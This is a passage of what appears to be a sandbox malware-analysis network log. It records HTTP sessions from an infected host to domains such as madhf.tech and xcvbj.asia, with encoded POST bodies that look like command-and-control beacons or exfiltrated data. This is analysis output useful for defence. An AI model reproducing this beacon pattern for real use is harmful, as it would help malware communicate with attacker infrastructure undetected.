                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            69192.168.11.204982246.30.211.3880
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:59:39.056277990 CET488OUTGET /uf7y/?2O=X8Xx4Xb3zOwIp/YkPeQkR0guwoAt7ELtmVzPPBr+rNKRcobOh5vjSVYUxnTRN3k+HcX7svN7WZWipHk078Y7lpE6s8+6fnJkBTwA9zJT+z2YULyhD3K67+Y=&ChhG6=J-xs HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Connection: close
                                                                            Host: www.bankseedz.info
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Dec 3, 2024 18:59:39.297710896 CET738INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                            Date: Tue, 03 Dec 2024 17:59:39 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Content-Length: 564
                                                                            Connection: close
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            70192.168.11.2049823103.224.182.24280
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:59:44.504518032 CET749OUTPOST /3iym/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 199
                                                                            Connection: close
                                                                            Host: www.madhf.tech
                                                                            Origin: http://www.madhf.tech
                                                                            Referer: http://www.madhf.tech/3iym/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 73 68 52 49 6d 55 4e 4c 43 44 36 79 6b 6b 48 4a 30 70 72 50 61 4b 7a 76 66 53 66 4e 46 42 50 30 72 4a 66 34 7a 6c 79 58 69 37 6f 77 4d 68 4f 31 6b 38 53 2f 42 49 79 63 6b 68 69 4c 66 31 66 52 34 63 66 36 64 45 68 68 79 71 61 7a 70 39 35 6c 34 69 6d 34 2b 62 33 69 2b 5a 74 6e 47 53 61 66 51 7a 59 6d 67 69 32 61 47 4e 4d 2f 64 4d 35 7a 66 72 4e 62 42 79 75 31 65 6a 6b 69 78 34 69 4b 33 64 52 69 79 48 4e 51 6a 78 2b 51 53 51 68 41 43 74 6d 66 38 6b 47 75 74 54 5a 30 55 70 33 52 73 56 4a 53 30 4e 59 58 62 47 48 63 6f 4d 70 7a 37 37 67 78 75 57 78 38 66 46 53 6d 66 37 78 58 79 67 3d 3d
                                                                            Data Ascii: 2O=shRImUNLCD6ykkHJ0prPaKzvfSfNFBP0rJf4zlyXi7owMhO1k8S/BIyckhiLf1fR4cf6dEhhyqazp95l4im4+b3i+ZtnGSafQzYmgi2aGNM/dM5zfrNbByu1ejkix4iK3dRiyHNQjx+QSQhACtmf8kGutTZ0Up3RsVJS0NYXbGHcoMpz77gxuWx8fFSmf7xXyg==
                                                                            Dec 3, 2024 18:59:44.713715076 CET871INHTTP/1.1 200 OK
                                                                            date: Tue, 03 Dec 2024 17:59:44 GMT
                                                                            server: Apache
                                                                            set-cookie: __tad=1733248784.2117578; expires=Fri, 01-Dec-2034 17:59:44 GMT; Max-Age=315360000
                                                                            vary: Accept-Encoding
                                                                            content-encoding: gzip
                                                                            content-length: 576
                                                                            content-type: text/html; charset=UTF-8
                                                                            connection: close
                                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 51 05 48 6d 1c 0e 48 48 20 0e 68 17 ce c8 eb 4c 1a ef 26 76 b0 a7 ed 56 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 77 24 6e d4 4e 9d a2 29 04 af 65 2a 6e 82 68 8c dd a0 1f bc b1 24 8c 69 b0 e8 8d 2d 6e 42 5a 95 e2 84 7d 29 55 95 ec 94 07 8f b5 f1 a8 e9 47 67 ec 2d 48 c8 5a a2 61 25 c4 7e bf 2f 9e d4 89 a5 39 f4 e2 7d b6 4e 12 21 e0 0a 09 14 90 e9 d1 6d 09 5c 03 cb c5 02 7a a3 bd 0b a8 9d ad 03 90 03 bc 43 bd 25 64 e0 43 09 30 0d 50 8b f0 4c 39 0c de f5 26 70 4c 99 2e 40 e3 3c 04 d7 23 53 54 70 36 69 b6 56 93 71 96 8f bb ee 5a e9 db cb 29 55 3e 87 fb 64 b6 37 b6 76 fb a2 73 5a 45 54 e1 71 e8 94 c6 fc 37 4f e7 59 33 c8 8b 77 d9 7c 9d 1c 93 84 fc 21 32 59 65 20 f0 b5 ff 36 99 90 10 90 a6 4d fe 67 b5 57 d1 20 f3 67 b1 61 cd f0 75 d2 2c e1 e3 93 93 cf 57 ac 43 d5 f9 7d ef ac 21 c7 a1 cd 2a ca 0e 78 8c cc 47 56 32 [TRUNCATED]
                                                                            Data Ascii: TM0=7b=$qQHmHH hL&vVwiX|I<~o8eK}W%eU6nKq$etPw$nN)e*nh$i-nBZ})UGg-HZa%~/9}N!m\zC%dC0PL9&pL.@<#STp6iVqZ)U>d7vsZETq7OY3w|!2Ye 6MgW gau,WC}!*xGV27d;8<mG~*h';?!z=tRn~:v2#!>cuccWxhw[[^/^[8G07uWqbykY\&RA8}-zR(8X7){$N/dm<@D.|x/hy@+e


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            71192.168.11.2049824103.224.182.24280
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:59:47.222424030 CET769OUTPOST /3iym/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 219
                                                                            Connection: close
                                                                            Host: www.madhf.tech
                                                                            Origin: http://www.madhf.tech
                                                                            Referer: http://www.madhf.tech/3iym/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 73 68 52 49 6d 55 4e 4c 43 44 36 79 6b 45 33 4a 31 4b 7a 50 62 71 7a 73 52 79 66 4e 54 78 50 77 72 4f 58 34 7a 6b 32 48 69 74 77 77 4d 44 57 31 6e 2b 71 2f 55 49 79 63 73 42 6a 44 62 31 65 64 34 63 54 63 64 41 39 68 79 71 2b 7a 70 39 4a 6c 34 31 79 35 6b 72 33 6b 32 35 74 6c 4c 79 61 66 51 7a 59 6d 67 6d 66 53 47 4e 30 2f 63 38 4a 7a 65 4b 4e 59 4a 53 75 32 64 6a 6b 69 6e 34 6a 42 33 64 52 63 79 46 70 36 6a 7a 32 51 53 53 70 41 43 2f 4f 59 32 6b 47 6f 77 44 59 4c 51 34 65 4e 68 48 77 6b 38 74 77 51 56 56 36 6e 67 36 6b 70 6d 4a 55 56 74 46 74 4f 62 31 72 4f 64 35 77 4d 76 68 6d 61 2f 34 4d 4b 76 45 37 4f 39 30 36 42 74 71 55 31 49 2f 67 3d
                                                                            Data Ascii: 2O=shRImUNLCD6ykE3J1KzPbqzsRyfNTxPwrOX4zk2HitwwMDW1n+q/UIycsBjDb1ed4cTcdA9hyq+zp9Jl41y5kr3k25tlLyafQzYmgmfSGN0/c8JzeKNYJSu2djkin4jB3dRcyFp6jz2QSSpAC/OY2kGowDYLQ4eNhHwk8twQVV6ng6kpmJUVtFtOb1rOd5wMvhma/4MKvE7O906BtqU1I/g=
                                                                            Dec 3, 2024 18:59:47.416393995 CET871INHTTP/1.1 200 OK
                                                                            date: Tue, 03 Dec 2024 17:59:47 GMT
                                                                            server: Apache
                                                                            set-cookie: __tad=1733248787.4845084; expires=Fri, 01-Dec-2034 17:59:47 GMT; Max-Age=315360000
                                                                            vary: Accept-Encoding
                                                                            content-encoding: gzip
                                                                            content-length: 576
                                                                            content-type: text/html; charset=UTF-8
                                                                            connection: close
                                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 51 05 48 6d 1c 0e 48 48 20 0e 68 17 ce c8 eb 4c 1a ef 26 76 b0 a7 ed 56 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 77 24 6e d4 4e 9d a2 29 04 af 65 2a 6e 82 68 8c dd a0 1f bc b1 24 8c 69 b0 e8 8d 2d 6e 42 5a 95 e2 84 7d 29 55 95 ec 94 07 8f b5 f1 a8 e9 47 67 ec 2d 48 c8 5a a2 61 25 c4 7e bf 2f 9e d4 89 a5 39 f4 e2 7d b6 4e 12 21 e0 0a 09 14 90 e9 d1 6d 09 5c 03 cb c5 02 7a a3 bd 0b a8 9d ad 03 90 03 bc 43 bd 25 64 e0 43 09 30 0d 50 8b f0 4c 39 0c de f5 26 70 4c 99 2e 40 e3 3c 04 d7 23 53 54 70 36 69 b6 56 93 71 96 8f bb ee 5a e9 db cb 29 55 3e 87 fb 64 b6 37 b6 76 fb a2 73 5a 45 54 e1 71 e8 94 c6 fc 37 4f e7 59 33 c8 8b 77 d9 7c 9d 1c 93 84 fc 21 32 59 65 20 f0 b5 ff 36 99 90 10 90 a6 4d fe 67 b5 57 d1 20 f3 67 b1 61 cd f0 75 d2 2c e1 e3 93 93 cf 57 ac 43 d5 f9 7d ef ac 21 c7 a1 cd 2a ca 0e 78 8c cc 47 56 32 [TRUNCATED]
                                                                            Data Ascii: TM0=7b=$qQHmHH hL&vVwiX|I<~o8eK}W%eU6nKq$etPw$nN)e*nh$i-nBZ})UGg-HZa%~/9}N!m\zC%dC0PL9&pL.@<#STp6iVqZ)U>d7vsZETq7OY3w|!2Ye 6MgW gau,WC}!*xGV27d;8<mG~*h';?!z=tRn~:v2#!>cuccWxhw[[^/^[8G07uWqbykY\&RA8}-zR(8X7){$N/dm<@D.|x/hy@+e


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            72192.168.11.2049825103.224.182.24280
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:59:49.940721035 CET1289OUTPOST /3iym/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 7367
                                                                            Connection: close
                                                                            Host: www.madhf.tech
                                                                            Origin: http://www.madhf.tech
                                                                            Referer: http://www.madhf.tech/3iym/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 73 68 52 49 6d 55 4e 4c 43 44 36 79 6b 45 33 4a 31 4b 7a 50 62 71 7a 73 52 79 66 4e 54 78 50 77 72 4f 58 34 7a 6b 32 48 69 74 34 77 50 77 65 31 6e 5a 47 2f 53 34 79 63 76 42 6a 41 62 31 66 48 34 63 37 59 64 48 31 78 79 6f 32 7a 6d 2b 78 6c 70 30 79 35 71 62 33 6b 30 35 74 6d 47 53 61 77 51 7a 4a 68 67 69 7a 53 47 4e 30 2f 63 2b 42 7a 4f 72 4e 59 45 79 75 31 65 6a 6b 6d 78 34 6a 70 33 64 59 6e 79 46 73 50 6a 41 4f 51 52 79 5a 41 42 4c 75 59 30 45 47 71 78 44 59 54 51 34 43 6b 68 48 39 62 38 74 55 36 56 58 61 6e 6c 37 45 7a 31 4b 78 4c 34 44 56 33 62 78 53 74 57 70 59 50 76 68 76 6a 37 62 51 49 6c 43 72 62 2b 30 43 57 36 4a 38 4e 64 49 76 2f 65 70 48 5a 5a 41 44 71 46 56 4b 51 49 36 56 36 42 52 67 6e 54 75 39 56 53 51 46 5a 4d 53 67 54 4f 79 46 32 44 4e 67 53 33 50 30 79 4b 68 56 35 42 6e 35 5a 61 49 71 4d 63 33 44 30 30 48 66 32 75 39 76 2b 36 7a 53 67 49 35 2b 71 6d 76 56 44 55 6c 4c 67 58 34 6a 57 4b 62 78 48 44 69 46 73 4d 30 51 77 6e 48 7a 59 62 61 37 58 44 75 78 4f 6a 36 79 72 38 35 34 [TRUNCATED]
                                                                            Data Ascii: 2O=shRImUNLCD6ykE3J1KzPbqzsRyfNTxPwrOX4zk2Hit4wPwe1nZG/S4ycvBjAb1fH4c7YdH1xyo2zm+xlp0y5qb3k05tmGSawQzJhgizSGN0/c+BzOrNYEyu1ejkmx4jp3dYnyFsPjAOQRyZABLuY0EGqxDYTQ4CkhH9b8tU6VXanl7Ez1KxL4DV3bxStWpYPvhvj7bQIlCrb+0CW6J8NdIv/epHZZADqFVKQI6V6BRgnTu9VSQFZMSgTOyF2DNgS3P0yKhV5Bn5ZaIqMc3D00Hf2u9v+6zSgI5+qmvVDUlLgX4jWKbxHDiFsM0QwnHzYba7XDuxOj6yr8547dMbm3Sd7TlcmZhywWzB+PNKHa3bbf8JKCuShGJWHD5gnNRYm9cq8DVM3cDIVTULY/yjaVzfE9AjS8RJx0zzMQry8A127DMgjvBH16yYV4rLK9EI1xHOJDUJ9USpsY4Dc/v6bfi96o2tNX94On+X7q0gDi3suIC7XM4Dj4Urdx3PiVyi1Wl7rqJzlGuEsjocWMfuperkBu0LcD3kJBB7LqZE6nqxaEHqbzVy3Eq7z/YDdF1c0M/sE5LoBfJgV5QSYSuCzFZWcw4PSXIRsMX89trNMlK0y4/GgXl+JHCVtUNq4nSR5azjl6Cwa4i8Ssu7iinPaFaoBbJ2iiRDn53NVNXdL5ZTGNYKlcTdOn5bE0+NRk65qKvXf50dNqgrEnCZ8CCHxJkO9FcVoAIi
                                                                            Dec 3, 2024 18:59:49.940784931 CET5156OUTData Raw: 75 57 67 76 78 56 44 30 38 58 5a 50 51 6f 4d 7a 4b 30 46 6f 65 36 65 34 6e 63 53 51 74 65 6a 75 4b 36 2f 6c 36 47 57 36 79 42 6a 37 30 6f 34 45 57 6c 2b 39 64 61 33 50 6e 30 53 70 68 2b 32 30 2f 6e 62 39 38 38 6c 68 74 69 6c 59 64 76 75 61 58 51
                                                                            Data Ascii: uWgvxVD08XZPQoMzK0Foe6e4ncSQtejuK6/l6GW6yBj70o4EWl+9da3Pn0Sph+20/nb988lhtilYdvuaXQqQd4QFoQB+iiVVhx/ujNjPtxbftgALAuc888ISkw9RjrbQsGqy7oGNA0KEi90MwmgNxCcyG2yzUS9W/Prd+5OjWN0ZS3QbLugiRpPNyVsRhwPOxFQJVqc70tWWvTZmF+ecOBy0hgOFAQCUzpKg+8Ll2GaOkjLtakV
                                                                            Dec 3, 2024 18:59:49.940841913 CET1473OUTData Raw: 44 36 73 66 4c 4c 71 68 41 41 5a 75 57 54 76 45 50 53 59 56 69 57 56 52 78 66 50 2b 68 50 47 38 6f 58 57 4d 71 74 7a 59 4c 47 74 55 56 2b 59 6f 35 52 38 30 50 6a 6c 71 6e 6a 46 59 75 54 63 65 44 33 6c 36 69 68 2b 6f 30 6d 32 59 67 6e 45 4a 68 36
                                                                            Data Ascii: D6sfLLqhAAZuWTvEPSYViWVRxfP+hPG8oXWMqtzYLGtUV+Yo5R80PjlqnjFYuTceD3l6ih+o0m2YgnEJh6DzDbYunktoTgPlUoF7tWq/ZbQIfSVSqeh5PTx55NDnUGnvkBq8bNAW9wJixpWYfYJMLWUUHylWudfPegjizVz6uiK173c6Tm5F8h6VIp3DeZmM64TzSsPp6JKLHHZtHnZDdQKGRTiL7DWUW+FFEfUQGu8e3q0Rdng
                                                                            Dec 3, 2024 18:59:50.135205984 CET871INHTTP/1.1 200 OK
                                                                            date: Tue, 03 Dec 2024 17:59:50 GMT
                                                                            server: Apache
                                                                            set-cookie: __tad=1733248790.1701818; expires=Fri, 01-Dec-2034 17:59:50 GMT; Max-Age=315360000
                                                                            vary: Accept-Encoding
                                                                            content-encoding: gzip
                                                                            content-length: 576
                                                                            content-type: text/html; charset=UTF-8
                                                                            connection: close
                                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 51 05 48 6d 1c 0e 48 48 20 0e 68 17 ce c8 eb 4c 1a ef 26 76 b0 a7 ed 56 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 77 24 6e d4 4e 9d a2 29 04 af 65 2a 6e 82 68 8c dd a0 1f bc b1 24 8c 69 b0 e8 8d 2d 6e 42 5a 95 e2 84 7d 29 55 95 ec 94 07 8f b5 f1 a8 e9 47 67 ec 2d 48 c8 5a a2 61 25 c4 7e bf 2f 9e d4 89 a5 39 f4 e2 7d b6 4e 12 21 e0 0a 09 14 90 e9 d1 6d 09 5c 03 cb c5 02 7a a3 bd 0b a8 9d ad 03 90 03 bc 43 bd 25 64 e0 43 09 30 0d 50 8b f0 4c 39 0c de f5 26 70 4c 99 2e 40 e3 3c 04 d7 23 53 54 70 36 69 b6 56 93 71 96 8f bb ee 5a e9 db cb 29 55 3e 87 fb 64 b6 37 b6 76 fb a2 73 5a 45 54 e1 71 e8 94 c6 fc 37 4f e7 59 33 c8 8b 77 d9 7c 9d 1c 93 84 fc 21 32 59 65 20 f0 b5 ff 36 99 90 10 90 a6 4d fe 67 b5 57 d1 20 f3 67 b1 61 cd f0 75 d2 2c e1 e3 93 93 cf 57 ac 43 d5 f9 7d ef ac 21 c7 a1 cd 2a ca 0e 78 8c cc 47 56 32 [TRUNCATED]
                                                                            Data Ascii: TM0=7b=$qQHmHH hL&vVwiX|I<~o8eK}W%eU6nKq$etPw$nN)e*nh$i-nBZ})UGg-HZa%~/9}N!m\zC%dC0PL9&pL.@<#STp6iVqZ)U>d7vsZETq7OY3w|!2Ye 6MgW gau,WC}!*xGV27d;8<mG~*h';?!z=tRn~:v2#!>cuccWxhw[[^/^[8G07uWqbykY\&RA8}-zR(8X7){$N/dm<@D.|x/hy@+e


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            73192.168.11.2049826103.224.182.24280
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:59:52.657898903 CET484OUTGET /3iym/?2O=hj5olkscFnqSpGaYqfjBZra7XyaBOSmns9/m32Sz6t4FBTGsttWpVpOBqSKeTRLk/faBYURW8ZeFt/JnnXLugYa/8Lo3QiO3YShHpm3KJLMhWdtiao9fFGg=&ChhG6=J-xs HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Connection: close
                                                                            Host: www.madhf.tech
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Dec 3, 2024 18:59:52.856648922 CET1289INHTTP/1.1 200 OK
                                                                            date: Tue, 03 Dec 2024 17:59:52 GMT
                                                                            server: Apache
                                                                            set-cookie: __tad=1733248792.6393748; expires=Fri, 01-Dec-2034 17:59:52 GMT; Max-Age=315360000
                                                                            vary: Accept-Encoding
                                                                            content-length: 1457
                                                                            content-type: text/html; charset=UTF-8
                                                                            connection: close
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 6d 61 64 68 66 2e 74 65 63 68 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 64 68 66 2e 74 65 63 68 2f 33 69 79 6d 2f 3f 32 4f 3d 68 6a 35 6f 6c 6b 73 63 46 6e 71 53 70 47 61 59 71 66 6a 42 5a 72 61 37 58 79 61 42 4f 53 6d 6e 73 39 2f 6d 33 32 53 7a 36 74 34 46 42 54 47 73 74 74 57 70 56 70 4f 42 71 53 4b 65 54 52 4c 6b 2f 66 61 42 59 55 52 57 38 5a 65 46 74 2f 4a 6e 6e 58 4c 75 67 59 61 2f 38 4c 6f 33 51 69 4f 33 59 53 68 48 70 6d 33 4b 4a 4c 4d 68 57 64 74 69 61 6f 39 66 46 47 67 3d 26 43 68 68 47 36 3d 4a 2d 78 73 26 27 3b 0a 0a 2f 2f 20 [TRUNCATED]
                                                                            Data Ascii: <html><head><title>madhf.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.madhf.tech/3iym/?2O=hj5olkscFnqSpGaYqfjBZra7XyaBOSmns9/m32Sz6t4FBTGsttWpVpOBqSKeTRLk/faBYURW8ZeFt/JnnXLugYa/8Lo3QiO3YShHpm3KJLMhWdtiao9fFGg=&ChhG6=J-xs&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolor="#ffffff" text="#000000"><div style='display: none;'><a href='http: [TRUNCATED]
                                                                            Dec 3, 2024 18:59:52.856698036 CET440INData Raw: 2e 6d 61 64 68 66 2e 74 65 63 68 2f 33 69 79 6d 2f 3f 32 4f 3d 68 6a 35 6f 6c 6b 73 63 46 6e 71 53 70 47 61 59 71 66 6a 42 5a 72 61 37 58 79 61 42 4f 53 6d 6e 73 39 2f 6d 33 32 53 7a 36 74 34 46 42 54 47 73 74 74 57 70 56 70 4f 42 71 53 4b 65 54
                                                                            Data Ascii: .madhf.tech/3iym/?2O=hj5olkscFnqSpGaYqfjBZra7XyaBOSmns9/m32Sz6t4FBTGsttWpVpOBqSKeTRLk/faBYURW8ZeFt/JnnXLugYa/8Lo3QiO3YShHpm3KJLMhWdtiao9fFGg=&ChhG6=J-xs&fp=-3'>Click here to enter</a></div><noscript><meta http-equiv="refresh" content="0; URL=


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            74192.168.11.2049827149.88.81.19080
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:59:58.213764906 CET749OUTPOST /hkgx/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 199
                                                                            Connection: close
                                                                            Host: www.xcvbj.asia
                                                                            Origin: http://www.xcvbj.asia
                                                                            Referer: http://www.xcvbj.asia/hkgx/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
